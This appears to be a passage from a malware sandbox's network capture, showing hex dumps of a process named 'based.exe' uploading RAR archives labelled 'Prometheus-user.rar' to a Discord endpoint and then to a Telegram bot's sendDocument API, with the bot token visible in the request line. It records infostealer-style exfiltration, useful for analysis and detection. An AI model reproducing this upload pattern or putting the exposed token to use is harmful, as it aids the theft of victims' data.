--ae617a8a1c033a753623c0f68de035b0Content-Disposition: form-data; name="file"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!!q8:Xh?L(jeS5@(b!hs;<],WMwo`o:11}\|{
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: ca f1 a7 f0 44 7b 5d 14 09 9c 66 70 2f 68 d3 8f df cc db c4 25 98 96 25 58 76 ae ae db 27 4c 70 68 76 21 d6 71 14 d3 54 cb c3 8d 22 15 ec f6 1b 75 a2 ab 7d cd 09 ca 93 a9 bf a2 08 68 26 0a 2b 0d b4 71 19 9e 9b a1 97 12 a3 df c7 7d d2 78 63 e3 eb bb b5 ae 31 d1 ae 35 5e 2f 15 6b a4 ee db da f6 f1 d6 03 89 72 61 46 7f 54 40 af 99 52 6b 68 51 22 e3 2f c8 59 a8 39 64 a7 2c f8 e7 71 06 0f b9 59 cb da 8f 06 bf 85 d6 a1 f9 78 3d b9 ed 9e ca 04 5e 60 e1 ac 50 fc c5 00 32 40 71 ec ec 5d ad 08 8f de bc 98 47 1c b5 9b dd a9 e6 ed ee cf 4d 58 7f 3b 3b 7d 2a 38 98 86 0f bc d9 c9 a3 24 2d e2 98 d7 16 fa 33 aa 9c 2f 1e 14 23 6e bb 82 be 6b bc ef 7e 17 e2 6e 40 8c 91 6a 30 bc 0d 58 5f 8c 74 dc 86 c6 e4 9b f5 9e 69 47 f2 79 61 f1 e3 e0 e4 6d e4 6a b2 13 68 b2 e0 01 eb 69 Data Ascii: D{]fp/h%%Xv'Lphv!qT"u}h&+q}xc15^/kraFT@RkhQ"/Y9d,qYx=^`P2@q]GMX;;}*8$-3/#nk~n@j0X_tiGyamjhi
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: 82 64 67 58 9b 3a be 15 50 4b ab ca c0 64 42 24 12 3d 13 76 ce 38 7f b4 ca 67 55 58 e6 f3 52 52 fb bc 0c 60 49 a6 bf 3c 27 89 96 3f 83 b7 d8 14 94 94 65 6f fe c3 db e1 87 b5 33 1f 7d 38 9f 15 78 54 84 6c c9 1e e5 1a 78 3e 63 e9 f1 5c b5 52 55 fa a3 dd 20 5e cc 4e b1 d5 6f a6 83 ca 6b a7 f6 26 f2 16 b4 82 2c fd c7 fd a6 40 02 f2 9b 50 ee 05 8c 62 6a 3b 9d 9c 83 f7 ee c7 0f 6f e3 16 5e c6 56 fb 1a fa 71 c5 bf 6c 47 a9 f5 c1 ca 79 44 11 dc 39 bc 84 1c 63 3a c3 e5 bb fd 50 24 72 b3 59 c5 fd 8e be aa 84 70 19 e5 8e 80 ba 80 44 3c 22 4b 3e 0a b8 aa e1 7c b0 9c cf 08 f7 ea a8 b7 5d 53 b4 74 24 e9 3b 83 70 e1 d7 47 38 87 20 18 c2 91 f7 b1 e6 85 0f f7 2c af 01 b7 e9 79 72 0a 6b ac f0 e3 2b 3f e5 c6 cd ac c5 74 72 8e bc 24 39 28 29 99 c2 33 1e a6 42 90 2a 2d 9b 22 Data Ascii: dgX:PKdB$=v8gUXRR`I<'?eo3}8xTlx>c\RU ^Nok&,@Pbj;o^VqlGyD9c:P$rYpD<"K>\|]St$;pG8 ,yrk+?tr$9()3B*-"
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: 5c 55 d5 ec ab 08 b0 9b 00 2e 2e b2 89 4c db c4 87 47 d5 26 56 16 de 1c f5 0c 5b 23 91 fb c7 3b 2c c6 f8 e1 69 a8 58 22 ed e2 f8 5b 70 4b 76 6c fe fb 1d cb 99 ec 16 6b 40 f3 bc 97 eb a7 01 c5 86 9a bb 9c 6e db ce 52 c0 06 30 1a df 53 67 2f d2 e3 03 8c 33 3b ec 2a 47 d8 f8 87 cc 95 dc 17 d5 c3 5e d2 37 55 1a 7a 8a b1 78 fc 5b b8 d5 5e ee 73 83 a0 a6 84 e8 fc d6 52 e8 b8 fb 6a 57 5b 39 de 35 14 f1 b0 95 b6 7e 04 15 27 97 84 c9 13 51 e1 80 d0 51 63 56 2d 23 69 0a 34 2c 17 9c 35 a7 07 71 4c 11 e8 23 cc 8f ec 91 24 f2 6a 54 c7 98 e9 02 99 fc b6 23 f7 ba c0 21 58 58 a4 0b 66 a1 94 73 34 87 f2 6a 4b 10 71 a5 80 f5 5f fb 4d 0a 30 3b f3 7e c8 98 d2 ef eb 9a d9 5a ab ed ad 1b a9 d6 58 ff 43 8e 36 98 48 71 30 1c 67 5e 02 8b f8 d4 74 6b dd d4 21 ad c8 9b 42 3a ba 03 Data Ascii: \U..LG&V[#;,iX"[pKvlk@nR0Sg/3;*G^7Uzx[^sRjW[95~'QQcV-#i4,5qL#$jT#!XXfs4jKq_M0;~ZXC6Hq0g^tk!B:
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: a2 a5 09 83 16 4e 0d c8 2f fc 6c 23 8b 61 04 0b 92 72 3d 64 1e 90 38 d6 78 71 60 8b b9 19 c8 de c2 4c 96 b0 94 ac 76 d2 9b 3c 88 f9 ed 1f 76 b6 1f a8 20 94 0c a4 36 1c f0 a5 91 ff 4b d7 1b 17 35 7f bf c7 c1 98 ac 55 6b c3 c8 c8 f5 5c 3a 43 b2 84 f5 dd c6 08 b1 de 24 26 c2 e4 8a ee 78 2c 3f 7c af 74 6a 60 3f 49 cf c7 95 4c 16 d1 69 ec 69 e9 19 1f a3 53 bb d9 f7 8e 32 72 59 a2 1b 85 9f 79 8d 05 1a e3 ae 1a cd 1a 0a e8 f0 2e 8d 94 24 21 b4 a1 d8 fb 2f ab e8 31 c6 01 73 9e 2a c1 27 27 fe 71 c5 11 f3 ac 78 d7 06 13 2d f6 4a 5d 7e 83 5a 52 3d 7e 2b 28 c9 3c 53 ca bb a9 c1 59 42 5a 2d dd 19 b2 44 ff 18 10 3b 2c 91 d0 f4 13 89 52 96 c9 0b 80 79 84 20 98 7b d9 d4 e6 c7 76 1a e3 ba 4f f5 7d aa d1 e3 87 6f 31 f4 b6 84 19 51 6e 97 f4 08 28 29 ce 28 69 9b 02 2e 68 e9 Data Ascii: N/l#ar=d8xq`Lv<v 6K5Uk\:C$&x,?\|tj`?ILiiS2rYy.$!/1s*''qx-J]~ZR=~+(<SYBZ-D;,Ry {vO}o1Qn()(i.h
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: 69 6d 59 26 99 13 95 6b f3 ae 5f 7e aa ae 73 c8 96 07 2b 8c fb 64 0e 57 a3 f8 b9 40 83 b0 04 c4 d0 c1 68 15 10 f2 bf 37 59 2d 2e 6b d6 b9 f6 82 0c 06 d2 7d 16 4d 29 e2 6a c1 6e a9 fa 7d 6c 3a 6b 37 1c a9 e6 39 6b 39 df f6 40 ad 83 76 52 86 e9 b1 5b 69 de e5 7d 08 7e 35 dc 1f b0 0a 2b 04 3d 7d 8a 8c 11 c0 a7 af 74 f4 87 23 b7 c0 87 53 4a 15 41 e7 d7 a8 1d 4f b5 c8 c0 b5 0e 20 53 64 37 6d 85 36 d7 ff 15 27 0f 58 0e e3 25 52 1e 7b 82 66 f0 4c f4 a3 0f e6 19 97 14 24 42 fb aa af 55 33 fd 85 e9 bc ee e1 50 32 00 a9 0c 77 d7 34 3d 8d 12 eb d8 34 18 56 e3 e2 d7 33 df 33 85 d4 83 12 d9 55 86 44 9f f4 f5 f7 f7 b6 9c af ae fb fb 68 14 09 d0 7e 7c ac b2 41 5b 80 a5 99 9e f7 ad 7b 31 7a 88 c6 3c 36 dc 37 82 47 df 11 f7 d3 23 e9 c0 80 83 0a f9 bb 8e 9d 7c 3c af 30 96 Data Ascii: imY&k_~s+dW@h7Y-.k}M)jn}l:k79k9@vR[i}~5+=}t#SJAO Sd7m6'X%R{fL$BU3P2w4=4V33UDh~\|A[{1z<67G#\|<0
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: 47 3f 80 da e1 00 b3 14 ad 9e e8 71 26 7a d9 de 9a bc 20 9e f1 da 20 48 da 59 54 ab 6e 10 95 a9 d0 fa c4 00 12 27 9c d2 3f 3c ec c1 1d d6 6c 54 72 df b3 a0 8e 9c 0b 68 39 e4 c4 f1 e3 c6 4f d5 83 43 26 da b8 11 40 e0 90 f3 9e 7c 4a fe 20 f0 4e 81 d4 47 5e 70 e2 84 a8 28 76 00 65 08 63 b5 b3 15 e5 e2 7c 8d 24 e2 21 35 1e 6d 6d 5a 2d d1 18 5e b3 cf 73 e5 64 93 b8 38 52 67 76 f9 2f ca 28 cb f6 96 28 80 72 3c b0 ed da 86 39 34 d3 fe 79 e0 a3 0c 8f a8 d2 c6 fb 9b d7 30 53 eb f6 07 82 22 80 e2 4c 21 34 e9 bd b6 54 0c e9 44 ed 5b 7e 19 12 96 ac f2 52 54 78 81 c3 02 4c d4 69 ac e5 16 bc 70 ee 76 f3 98 54 43 b1 9d 54 83 eb 0f 5b 48 20 27 6f 2f f6 e2 00 f4 12 c5 3e 4c 35 cd 7e 57 4f 83 bc 60 7c 1d cd 55 c9 b9 d3 41 30 81 a8 90 3d 5d 1f 15 a3 50 12 a2 bf e4 3a 41 74 Data Ascii: G?q&z HYTn'?<lTrh9OC&@\|J NG^p(vec\|$!5mmZ-^sd8Rgv/((r<94y0S"L!4TD[~RTxLipvTCT[H 'o/>L5~WO`\|UA0=]P:At
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: fd c9 17 f6 e8 36 ff 81 50 da 24 6c 71 4d 73 1a bd d2 d2 25 c5 2e 4f 5f 34 d9 09 b2 5b 33 3b 5b 41 6f 92 b8 9c 4f 3a ee 45 cc 51 4a 83 f0 5e 3e 37 46 37 e2 43 18 6e 88 b4 ea f2 1d bd e6 f5 2b 5d 66 78 36 fa 65 bb 84 21 d9 be ef 2f cf 23 fe 9f 71 f7 f5 5a f8 4f 80 84 4d 2f bc 02 cc 94 6f e4 ab c8 11 d3 ac 9c 1b 55 74 58 62 95 3e 6e 93 c8 45 95 16 b3 78 a6 24 45 de 8e 4b 34 ed de 09 6b c3 6d dc 66 c9 67 b4 e0 ed 41 a4 df 2d 8a 86 c8 cf e6 38 55 41 e8 16 75 08 1a 71 5b 68 ca 97 86 95 b8 19 9c 90 6f cf 43 91 6b e2 71 70 6b 00 ac 65 6c 13 0c 2e 87 1d 65 fb b0 8f 26 6e 19 f9 2d ed b8 df a8 3f 2a 6a b2 e5 f9 a7 a2 47 bb 7e de 09 8e 82 cb cf 25 89 93 59 34 b0 18 9c de 7d 4e 45 95 80 1e bd 8f 76 b3 98 ec 9c 75 87 0d 11 1d cf 2b 42 28 74 ee 3f 73 31 b3 d0 d3 a9 f7 Data Ascii: 6P$lqMs%.O_4[3;[AoO:EQJ^>7F7Cn+]fx6e!/#qZOM/oUtXb>nEx$EK4kmfgA-8UAuq[hoCkqpkel.e&n-?*jG~%Y4}NEvu+B(t?s1
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: 0e a8 63 d6 56 a6 0e 10 56 d6 3b 3f 03 ad d7 9d 67 5d c0 46 3c 1d 0b c0 90 c3 93 dd ba da 19 dd 7b c8 6b 3e 00 d0 ea 21 17 51 21 83 b8 5d 78 9e 83 10 2f d4 83 d0 2d 46 c8 a4 e5 83 8b b9 63 c7 e2 a9 38 f7 7c 63 a6 9f 88 13 94 db f4 a2 6a 28 19 be 00 19 f8 83 f8 c8 b9 01 2e 95 13 ae 4c e1 37 6d d4 95 4b 4f d2 f7 07 22 e7 a2 ce 02 25 2f d9 54 a9 a9 9e 3a 8e 4f a9 0f f2 b0 98 2d 3e c8 78 7f ff 66 a9 e6 d0 58 5e f2 ed 99 bb 88 7f f1 fa 75 93 50 37 8b 01 a3 28 9f 29 4b 9a 8c 8a e9 ad d5 2b 73 a5 4d f0 1d 3d d2 97 9e 10 3b 7f ac ac 09 80 91 ca d3 4a ef 3a d0 68 fa 2d 05 d1 b7 4d 6f 9a 12 c6 9c d2 f6 76 a1 cd 52 20 bb 9b 06 fb 7b da 31 34 10 2d ae 51 87 82 aa cd 8a 5e 40 d5 0f cc b4 0c fe 03 d4 36 c0 5b 43 12 1e 4d 88 89 a2 e6 c4 b1 80 07 73 04 66 04 91 52 56 15 Data Ascii: cVV;?g]F<{k>!Q!]x/-Fc8\|cj(.L7mKO"%/T:O->xfX^uP7()K+sM=;J:h-MovR {14-Q^@6[CMsfRV
2024-08-01 02:28:08 UTC	16384	OUT	Data Raw: f3 d6 c8 e8 03 5b a4 36 03 6d f8 45 e4 5c 93 c3 88 32 e4 e2 7e 89 18 8a 34 0b 0b 09 fa fb 88 d7 30 c3 91 1c 01 c9 f4 db 36 7c 05 01 31 b3 21 02 3d cf 35 ca 33 ff ed 14 d7 c1 94 ff 1d b9 f5 87 94 26 6e 00 b1 2d 0f 60 c2 77 6c ee 6d e1 7e c0 39 99 87 ac 0d 43 c7 fb 29 8f a2 c7 a8 43 42 8c 6d e6 63 cc b1 a2 af d6 cf 24 73 ac 6e a3 d7 6c db b0 c3 a7 21 5e 1e cc ae a5 6a 11 76 9e d8 c4 2a 8d 2a a3 79 d8 f1 6d 3b 6f bd b6 2d 4f b1 71 b6 d7 90 81 31 76 ab 64 d4 c3 b4 3a 31 af 9d c5 f9 63 d1 52 17 c6 23 b0 16 15 a8 bc 51 2a cd af 38 f2 3f 45 7c 70 c0 d4 ae 24 d3 17 87 6c 8b 40 e2 57 f4 37 f6 61 8b 75 9e f0 6c 00 c2 82 73 2b 2b d9 56 ce d8 bb 7d 4f 26 c2 8c 96 d0 6e 12 b5 53 da eb f3 6d df 59 d5 de b1 e3 41 98 57 6f 6c 33 5b 9e 45 1a 27 7f f0 9a c3 ec d2 27 bb 37 Data Ascii: [6mE\2~406\|1!=53&n-`wlm~9C)CBmc$snl!^jv*ym;o-Oq1vd:1cR#Q8?E\|p$l@W7auls++V}O&nSmYAWol3[E''7
2024-08-01 02:28:09 UTC	1363	IN	HTTP/1.1 404 Not Found Date: Thu, 01 Aug 2024 02:28:09 GMT Content-Type: application/json Content-Length: 45 Connection: close set-cookie: __dcfduid=b151a2c64fad11ef8beb969bb34c99ef; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1722479290 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y2C1ydocOQ2xMnFPXwJ2xVHefN1DwZxzUkt2yGnLAoV7iE5WV0r3QSdBKpqiNDNqOhMPa%2BBjzZBcJFV%2BK2fq8nEamAve7E2UQCVSILjZ9873ZF8SlAKmdavBLDQY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: __sdcfduid=b151a2c64fad11ef8beb969bb34c99ef78f5274c8378281a77dc6bf9633760fb25a9feef22631a2c005696eb41e4adde; Expires=Tue, 31-Jul-2029 02:28:09 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax Set-Cookie: __cfruid=3d905955f4beffde0eab7938151d2b1d8621eb2e-1722479289; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49748	149.154.167.220	443	6828	C:\ProgramData\Microsoft\based.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-01 02:28:10 UTC	268	OUT	POST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1 Host: api.telegram.org Accept-Encoding: identity Content-Length: 760854 User-Agent: python-urllib3/2.2.2 Content-Type: multipart/form-data; boundary=ae238c8c91c4161f55fc64918e1aaa2d
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: 2d 2d 61 65 32 33 38 63 38 63 39 31 63 34 31 36 31 66 35 35 66 63 36 34 39 31 38 65 31 61 61 61 32 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 a9 1d ba 09 21 04 00 00 01 0f e2 71 38 3a bd e9 e2 94 0c 58 bd d8 68 08 3f 4c 28 e3 13 6a 65 83 dc 53 13 a9 35 40 28 62 92 8d d1 e9 06 21 68 73 bc 3b 3c 5d f0 f5 98 2c 57 07 f8 4d 77 e6 6f a1 0b 02 e9 94 07 91 60 6f 3a b2 31 8b 31 7d e7 10 b5 dc a8 85 0f 7c 17 Data Ascii: --ae238c8c91c4161f55fc64918e1aaa2dContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!!q8:Xh?L(jeS5@(b!hs;<],WMwo`o:11}\|
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: 2e 87 e9 26 ca f1 a7 f0 44 7b 5d 14 09 9c 66 70 2f 68 d3 8f df cc db c4 25 98 96 25 58 76 ae ae db 27 4c 70 68 76 21 d6 71 14 d3 54 cb c3 8d 22 15 ec f6 1b 75 a2 ab 7d cd 09 ca 93 a9 bf a2 08 68 26 0a 2b 0d b4 71 19 9e 9b a1 97 12 a3 df c7 7d d2 78 63 e3 eb bb b5 ae 31 d1 ae 35 5e 2f 15 6b a4 ee db da f6 f1 d6 03 89 72 61 46 7f 54 40 af 99 52 6b 68 51 22 e3 2f c8 59 a8 39 64 a7 2c f8 e7 71 06 0f b9 59 cb da 8f 06 bf 85 d6 a1 f9 78 3d b9 ed 9e ca 04 5e 60 e1 ac 50 fc c5 00 32 40 71 ec ec 5d ad 08 8f de bc 98 47 1c b5 9b dd a9 e6 ed ee cf 4d 58 7f 3b 3b 7d 2a 38 98 86 0f bc d9 c9 a3 24 2d e2 98 d7 16 fa 33 aa 9c 2f 1e 14 23 6e bb 82 be 6b bc ef 7e 17 e2 6e 40 8c 91 6a 30 bc 0d 58 5f 8c 74 dc 86 c6 e4 9b f5 9e 69 47 f2 79 61 f1 e3 e0 e4 6d e4 6a b2 13 68 b2 Data Ascii: .&D{]fp/h%%Xv'Lphv!qT"u}h&+q}xc15^/kraFT@RkhQ"/Y9d,qYx=^`P2@q]GMX;;}*8$-3/#nk~n@j0X_tiGyamjh
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: db 63 eb 5c 82 64 67 58 9b 3a be 15 50 4b ab ca c0 64 42 24 12 3d 13 76 ce 38 7f b4 ca 67 55 58 e6 f3 52 52 fb bc 0c 60 49 a6 bf 3c 27 89 96 3f 83 b7 d8 14 94 94 65 6f fe c3 db e1 87 b5 33 1f 7d 38 9f 15 78 54 84 6c c9 1e e5 1a 78 3e 63 e9 f1 5c b5 52 55 fa a3 dd 20 5e cc 4e b1 d5 6f a6 83 ca 6b a7 f6 26 f2 16 b4 82 2c fd c7 fd a6 40 02 f2 9b 50 ee 05 8c 62 6a 3b 9d 9c 83 f7 ee c7 0f 6f e3 16 5e c6 56 fb 1a fa 71 c5 bf 6c 47 a9 f5 c1 ca 79 44 11 dc 39 bc 84 1c 63 3a c3 e5 bb fd 50 24 72 b3 59 c5 fd 8e be aa 84 70 19 e5 8e 80 ba 80 44 3c 22 4b 3e 0a b8 aa e1 7c b0 9c cf 08 f7 ea a8 b7 5d 53 b4 74 24 e9 3b 83 70 e1 d7 47 38 87 20 18 c2 91 f7 b1 e6 85 0f f7 2c af 01 b7 e9 79 72 0a 6b ac f0 e3 2b 3f e5 c6 cd ac c5 74 72 8e bc 24 39 28 29 99 c2 33 1e a6 42 90 Data Ascii: c\dgX:PKdB$=v8gUXRR`I<'?eo3}8xTlx>c\RU ^Nok&,@Pbj;o^VqlGyD9c:P$rYpD<"K>\|]St$;pG8 ,yrk+?tr$9()3B
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: 0e 7c 06 62 5c 55 d5 ec ab 08 b0 9b 00 2e 2e b2 89 4c db c4 87 47 d5 26 56 16 de 1c f5 0c 5b 23 91 fb c7 3b 2c c6 f8 e1 69 a8 58 22 ed e2 f8 5b 70 4b 76 6c fe fb 1d cb 99 ec 16 6b 40 f3 bc 97 eb a7 01 c5 86 9a bb 9c 6e db ce 52 c0 06 30 1a df 53 67 2f d2 e3 03 8c 33 3b ec 2a 47 d8 f8 87 cc 95 dc 17 d5 c3 5e d2 37 55 1a 7a 8a b1 78 fc 5b b8 d5 5e ee 73 83 a0 a6 84 e8 fc d6 52 e8 b8 fb 6a 57 5b 39 de 35 14 f1 b0 95 b6 7e 04 15 27 97 84 c9 13 51 e1 80 d0 51 63 56 2d 23 69 0a 34 2c 17 9c 35 a7 07 71 4c 11 e8 23 cc 8f ec 91 24 f2 6a 54 c7 98 e9 02 99 fc b6 23 f7 ba c0 21 58 58 a4 0b 66 a1 94 73 34 87 f2 6a 4b 10 71 a5 80 f5 5f fb 4d 0a 30 3b f3 7e c8 98 d2 ef eb 9a d9 5a ab ed ad 1b a9 d6 58 ff 43 8e 36 98 48 71 30 1c 67 5e 02 8b f8 d4 74 6b dd d4 21 ad c8 9b Data Ascii: \|b\U..LG&V[#;,iX"[pKvlk@nR0Sg/3;*G^7Uzx[^sRjW[95~'QQcV-#i4,5qL#$jT#!XXfs4jKq_M0;~ZXC6Hq0g^tk!
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: f5 73 8b da a2 a5 09 83 16 4e 0d c8 2f fc 6c 23 8b 61 04 0b 92 72 3d 64 1e 90 38 d6 78 71 60 8b b9 19 c8 de c2 4c 96 b0 94 ac 76 d2 9b 3c 88 f9 ed 1f 76 b6 1f a8 20 94 0c a4 36 1c f0 a5 91 ff 4b d7 1b 17 35 7f bf c7 c1 98 ac 55 6b c3 c8 c8 f5 5c 3a 43 b2 84 f5 dd c6 08 b1 de 24 26 c2 e4 8a ee 78 2c 3f 7c af 74 6a 60 3f 49 cf c7 95 4c 16 d1 69 ec 69 e9 19 1f a3 53 bb d9 f7 8e 32 72 59 a2 1b 85 9f 79 8d 05 1a e3 ae 1a cd 1a 0a e8 f0 2e 8d 94 24 21 b4 a1 d8 fb 2f ab e8 31 c6 01 73 9e 2a c1 27 27 fe 71 c5 11 f3 ac 78 d7 06 13 2d f6 4a 5d 7e 83 5a 52 3d 7e 2b 28 c9 3c 53 ca bb a9 c1 59 42 5a 2d dd 19 b2 44 ff 18 10 3b 2c 91 d0 f4 13 89 52 96 c9 0b 80 79 84 20 98 7b d9 d4 e6 c7 76 1a e3 ba 4f f5 7d aa d1 e3 87 6f 31 f4 b6 84 19 51 6e 97 f4 08 28 29 ce 28 69 9b Data Ascii: sN/l#ar=d8xq`Lv<v 6K5Uk\:C$&x,?\|tj`?ILiiS2rYy.$!/1s*''qx-J]~ZR=~+(<SYBZ-D;,Ry {vO}o1Qn()(i
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: 6f 46 08 f3 69 6d 59 26 99 13 95 6b f3 ae 5f 7e aa ae 73 c8 96 07 2b 8c fb 64 0e 57 a3 f8 b9 40 83 b0 04 c4 d0 c1 68 15 10 f2 bf 37 59 2d 2e 6b d6 b9 f6 82 0c 06 d2 7d 16 4d 29 e2 6a c1 6e a9 fa 7d 6c 3a 6b 37 1c a9 e6 39 6b 39 df f6 40 ad 83 76 52 86 e9 b1 5b 69 de e5 7d 08 7e 35 dc 1f b0 0a 2b 04 3d 7d 8a 8c 11 c0 a7 af 74 f4 87 23 b7 c0 87 53 4a 15 41 e7 d7 a8 1d 4f b5 c8 c0 b5 0e 20 53 64 37 6d 85 36 d7 ff 15 27 0f 58 0e e3 25 52 1e 7b 82 66 f0 4c f4 a3 0f e6 19 97 14 24 42 fb aa af 55 33 fd 85 e9 bc ee e1 50 32 00 a9 0c 77 d7 34 3d 8d 12 eb d8 34 18 56 e3 e2 d7 33 df 33 85 d4 83 12 d9 55 86 44 9f f4 f5 f7 f7 b6 9c af ae fb fb 68 14 09 d0 7e 7c ac b2 41 5b 80 a5 99 9e f7 ad 7b 31 7a 88 c6 3c 36 dc 37 82 47 df 11 f7 d3 23 e9 c0 80 83 0a f9 bb 8e 9d 7c Data Ascii: oFimY&k_~s+dW@h7Y-.k}M)jn}l:k79k9@vR[i}~5+=}t#SJAO Sd7m6'X%R{fL$BU3P2w4=4V33UDh~\|A[{1z<67G#\|
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: 01 36 a5 ab 47 3f 80 da e1 00 b3 14 ad 9e e8 71 26 7a d9 de 9a bc 20 9e f1 da 20 48 da 59 54 ab 6e 10 95 a9 d0 fa c4 00 12 27 9c d2 3f 3c ec c1 1d d6 6c 54 72 df b3 a0 8e 9c 0b 68 39 e4 c4 f1 e3 c6 4f d5 83 43 26 da b8 11 40 e0 90 f3 9e 7c 4a fe 20 f0 4e 81 d4 47 5e 70 e2 84 a8 28 76 00 65 08 63 b5 b3 15 e5 e2 7c 8d 24 e2 21 35 1e 6d 6d 5a 2d d1 18 5e b3 cf 73 e5 64 93 b8 38 52 67 76 f9 2f ca 28 cb f6 96 28 80 72 3c b0 ed da 86 39 34 d3 fe 79 e0 a3 0c 8f a8 d2 c6 fb 9b d7 30 53 eb f6 07 82 22 80 e2 4c 21 34 e9 bd b6 54 0c e9 44 ed 5b 7e 19 12 96 ac f2 52 54 78 81 c3 02 4c d4 69 ac e5 16 bc 70 ee 76 f3 98 54 43 b1 9d 54 83 eb 0f 5b 48 20 27 6f 2f f6 e2 00 f4 12 c5 3e 4c 35 cd 7e 57 4f 83 bc 60 7c 1d cd 55 c9 b9 d3 41 30 81 a8 90 3d 5d 1f 15 a3 50 12 a2 bf Data Ascii: 6G?q&z HYTn'?<lTrh9OC&@\|J NG^p(vec\|$!5mmZ-^sd8Rgv/((r<94y0S"L!4TD[~RTxLipvTCT[H 'o/>L5~WO`\|UA0=]P
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: c6 87 23 d6 fd c9 17 f6 e8 36 ff 81 50 da 24 6c 71 4d 73 1a bd d2 d2 25 c5 2e 4f 5f 34 d9 09 b2 5b 33 3b 5b 41 6f 92 b8 9c 4f 3a ee 45 cc 51 4a 83 f0 5e 3e 37 46 37 e2 43 18 6e 88 b4 ea f2 1d bd e6 f5 2b 5d 66 78 36 fa 65 bb 84 21 d9 be ef 2f cf 23 fe 9f 71 f7 f5 5a f8 4f 80 84 4d 2f bc 02 cc 94 6f e4 ab c8 11 d3 ac 9c 1b 55 74 58 62 95 3e 6e 93 c8 45 95 16 b3 78 a6 24 45 de 8e 4b 34 ed de 09 6b c3 6d dc 66 c9 67 b4 e0 ed 41 a4 df 2d 8a 86 c8 cf e6 38 55 41 e8 16 75 08 1a 71 5b 68 ca 97 86 95 b8 19 9c 90 6f cf 43 91 6b e2 71 70 6b 00 ac 65 6c 13 0c 2e 87 1d 65 fb b0 8f 26 6e 19 f9 2d ed b8 df a8 3f 2a 6a b2 e5 f9 a7 a2 47 bb 7e de 09 8e 82 cb cf 25 89 93 59 34 b0 18 9c de 7d 4e 45 95 80 1e bd 8f 76 b3 98 ec 9c 75 87 0d 11 1d cf 2b 42 28 74 ee 3f 73 31 b3 Data Ascii: #6P$lqMs%.O_4[3;[AoO:EQJ^>7F7Cn+]fx6e!/#qZOM/oUtXb>nEx$EK4kmfgA-8UAuq[hoCkqpkel.e&n-?*jG~%Y4}NEvu+B(t?s1
2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: 71 07 29 d0 0e a8 63 d6 56 a6 0e 10 56 d6 3b 3f 03 ad d7 9d 67 5d c0 46 3c 1d 0b c0 90 c3 93 dd ba da 19 dd 7b c8 6b 3e 00 d0 ea 21 17 51 21 83 b8 5d 78 9e 83 10 2f d4 83 d0 2d 46 c8 a4 e5 83 8b b9 63 c7 e2 a9 38 f7 7c 63 a6 9f 88 13 94 db f4 a2 6a 28 19 be 00 19 f8 83 f8 c8 b9 01 2e 95 13 ae 4c e1 37 6d d4 95 4b 4f d2 f7 07 22 e7 a2 ce 02 25 2f d9 54 a9 a9 9e 3a 8e 4f a9 0f f2 b0 98 2d 3e c8 78 7f ff 66 a9 e6 d0 58 5e f2 ed 99 bb 88 7f f1 fa 75 93 50 37 8b 01 a3 28 9f 29 4b 9a 8c 8a e9 ad d5 2b 73 a5 4d f0 1d 3d d2 97 9e 10 3b 7f ac ac 09 80 91 ca d3 4a ef 3a d0 68 fa 2d 05 d1 b7 4d 6f 9a 12 c6 9c d2 f6 76 a1 cd 52 20 bb 9b 06 fb 7b da 31 34 10 2d ae 51 87 82 aa cd 8a 5e 40 d5 0f cc b4 0c fe 03 d4 36 c0 5b 43 12 1e 4d 88 89 a2 e6 c4 b1 80 07 73 04 66 04 Data Ascii: q)cVV;?g]F<{k>!Q!]x/-Fc8\|cj(.L7mKO"%/T:O->xfX^uP7()K+sM=;J:h-MovR {14-Q^@6[CMsf
